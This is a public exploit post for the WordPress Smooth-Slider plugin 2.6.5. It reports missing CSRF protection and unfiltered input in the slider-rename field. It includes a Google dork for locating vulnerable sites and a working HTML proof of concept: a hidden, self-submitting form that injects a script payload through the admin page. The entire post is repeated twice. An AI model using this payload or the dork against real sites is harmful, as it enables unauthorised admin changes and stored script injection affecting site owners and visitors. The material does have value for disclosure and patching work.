############################################################
# Exploit Title: WordPress Plugin Smooth-Slider Multiple Exploits
# Google Dork: inurl:plugins/smooth-slider
# Date: 11-07-2015
# Exploit Author: bRpsd
# Vendor Homepage: https://wordpress.org/plugins/smooth-slider
# Version: 2.6.5 {latest} !
# Tested on: Windows 7,Linux
# Tested WordPress Version: WordPress 4.2.2 {latest} !
############################################################
Problem #1: Updating the slider title name OR Making a new one dosent require a [csrf] or [wpnounce] session.
Problem #2: Submitting a Cross Site Script is not filtered !
So you can submit a CSRF & XSS At the same time.
Vulnerable input : [rename_slider_to]
Proof - Of - Concept !
{HTML}
<p>Have a Nice Day ! (:<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://localhost/wordpress/wp-admin/admin.php?page=smooth-slider-admin' target="csrf-frame" id="csrf-form">
<input name="rename_slider_to" type="hidden" value="XSS HERE<script>Alert('t')</script>"/>
<input type='hidden' name='current_slider_id' value='1'>
<input type='hidden' name='rename_slider' value='Rename'>
<input type='hidden' name='active_tab' value='0'>
<input type='hidden' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
demo [test] :
http://www.exploit-id.com/ xD
==========================================================================
Solution : None yet from the vendor , but you can add your own [CSRF] token.
==========================================================================
# Exploit Title: WordPress Plugin Smooth-Slider Multiple Exploits
# Google Dork: inurl:plugins/smooth-slider
# Date: 11-07-2015
# Exploit Author: bRpsd
# Vendor Homepage: https://wordpress.org/plugins/smooth-slider
# Version: 2.6.5 {latest} !
# Tested on: Windows 7,Linux
# Tested WordPress Version: WordPress 4.2.2 {latest} !
############################################################
Problem #1: Updating the slider title name OR Making a new one dosent require a [csrf] or [wpnounce] session.
Problem #2: Submitting a Cross Site Script is not filtered !
So you can submit a CSRF & XSS At the same time.
Vulnerable input : [rename_slider_to]
Proof - Of - Concept !
{HTML}
<p>Have a Nice Day ! (:<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://localhost/wordpress/wp-admin/admin.php?page=smooth-slider-admin' target="csrf-frame" id="csrf-form">
<input name="rename_slider_to" type="hidden" value="XSS HERE<script>Alert('t')</script>"/>
<input type='hidden' name='current_slider_id' value='1'>
<input type='hidden' name='rename_slider' value='Rename'>
<input type='hidden' name='active_tab' value='0'>
<input type='hidden' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
demo [test] :
http://www.exploit-id.com/ xD
==========================================================================
Solution : None yet from the vendor , but you can add your own [CSRF] token.
==========================================================================